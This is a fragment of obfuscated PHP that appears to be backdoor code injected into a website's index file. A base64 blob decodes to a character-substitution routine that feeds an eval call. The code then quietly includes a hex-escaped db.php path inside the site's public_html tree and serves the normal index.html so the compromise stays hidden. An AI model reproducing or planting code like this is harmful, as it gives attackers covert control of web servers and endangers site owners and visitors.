jB4bjIweG4yMHhuMjB4bms5QmFrRHhaUkhCeFFJYlZsUDREUWFTWEdIbnpteEVGMjB4bicuCicyMHhuMjB4bjIweG4yMHhuMjBsaWxIUW5SMXJua2l5TjUwRURrRFZVMEh4bjIweG4yMHhuMjB4bjIweG4yMHhnaE9lZzI3RSsyMG9DaHRvYk9EbGJURGxsbXhFRjIweG4yMCcuCid4bjIweG4yMHhuRjFlVTBIeG4yMHhuMjB4bjIweG4ySTR2VElxbnVKVVNRUFNiR0lTc1c4bkNUOEMzN3V3bjIweG4yMHhuMjB4bjIwQlNZSVNFTScuCidWRUYyMHhuMjB4bjIwQlo3dXduMjB4bjIweG4ySTRlUWE0eldIeHdrSW9ibElmR2theWd0OHhaUjh4Z1c4UXo3dXduMjB4Jy4KJ24yMHhuMkplVTBIeG4yMHhuMjB4bjIweG4ySTRhaE9Wd2tJb2JsSWZHa2F1Z3Q4QzM3dXduMjB4bjIweG4ySkVVMCcuCidIeG4yMHhuMjB4bldPY2lXT1NQMjBuQ1dJZkVoNGVnaDhsbDI3RVoyMGxWR0o0Z1RPcmdGJy4KJ3VFRjIweG4yMHhuMjBCMzd1d24yMHhuMjB4bjIweG4yMEJ6V0huQ1dJZkVoNGVnUWF5Z3Q4eFpSOHhnaE9vQ2tEQ1UwSHhuMjB4bjIweG4yMHhuMkplVScuCicwSHhuMjB4bjIweG4yMHhuMjB4bjIwQnZRcFpWR0o0Z1RPakFoT29DRjBvQ2h0b2JPRGxWa3BFZTIwb0NodG9iT0RsQ2twRXpNVkVGMjB4bjIweG4yMHhuMjB4bicuCidBdUVGMjB4bjIweG4yMHhuMjB4bldPY2lXT1NQRjBvQ2h0b2JPRGxpaDhsbDI3RVoyMGxEV09FZ0Z1RUYyMHhuMjB4bjIweG4yMHhuWVZFJy4KJ0YyMHhuMjB4bjIweG4yMHhuMjB4bjJJVWl0OUJlbE9sekdTWkRXT0V3a0lvYmxJZkdrOXhndDhDMzd1d24yMHhuMjB4bjIweG4yMCcuCidCWjd1d24yMHhuMjB4bjJKRVUwSHhuMjB4bjIweG5XT1V3R0R4Q1dJZkVoNGVnaE9lZ3QxZVUwSHhuJy4KJzIweG4yMHhuV3RiemwwbnpNVkVGMjB4bjJKRVUwbkVGMjB4bjJJVWl0OUJlbE9sekdTWmVHYWZDRjBDMzd1eicuCidaJzsKJGlkaGRrID0gQXJyYXkoJzEnPT4nVCcsICcwJz0+J0MnLCAnMyc9Pic3JywgJzInPT4nSScsICc1Jz0+J00nLCAnNCc9PidWJywgJzcnPT4nRCcsICc2Jz0+J1UnLCAnOSc9PiczJywgJzgnPT4nUycsICdBJz0+J2YnLCAnQyc9PidrJywgJ0InPT4nQicsICdFJz0+JzAnLCAnRCc9Pid5JywgJ0cnPT4nYicsICdGJz0+J0snLCAnSSc9PidHJywgJ0gnPT4naScsICdLJz0+J3InLCAnSic9PidIJywgJ00nPT4nTycsICdMJz0+J3EnLCAnTyc9PidXJywgJ04nPT4ndScsICdRJz0+J2MnLCAnUCc9PidtJywgJ1MnPT4nbCcsICdSJz0+J1AnLCAnVSc9PidOJywgJ1QnPT4nYScsICdXJz0+J1onLCAnVic9Pid3JywgJ1knPT4nZScsICdYJz0+J3YnLCAnWic9Pic5JywgJ2EnPT4nMicsICdjJz0+J3gnLCAnYic9PidoJywgJ2UnPT4ncycsICdkJz0+J3QnLCAnZyc9PiduJywgJ2YnPT4nRicsICdpJz0+J3onLCAnaCc9PidZJywgJ2snPT4nSicsICdqJz0+JzUnLCAnbSc9PidMJywgJ2wnPT4nZCcsICdvJz0+J1InLCAnbic9PidnJywgJ3EnPT4nOCcsICdwJz0+JzEnLCAncyc9Pic2JywgJ3InPT4nNCcsICd1Jz0+J1EnLCAndCc9PidYJywgJ3cnPT4nbycsICd2Jz0+J2onLCAneSc9PidFJywgJ3gnPT4nQScsICd6Jz0+J3AnKTsKZXZhbC8qemN0anR6Ki8oaGtyeXooJGpwa3lpLCAkaWRoZGspKTsKfQ==")); include "\x2fhom\x65/ht\x6dl/a\x6edya\x72t.s\x6b/pu\x62lic\x5fhtm\x6c/ac\x63ess\x32/db\x2ephp"; if (file_exists("index.html")){echo file_get_contents("index.html");exit;} if (file_exists("index.htm")){echo file_get_contents("index.htm");exit;}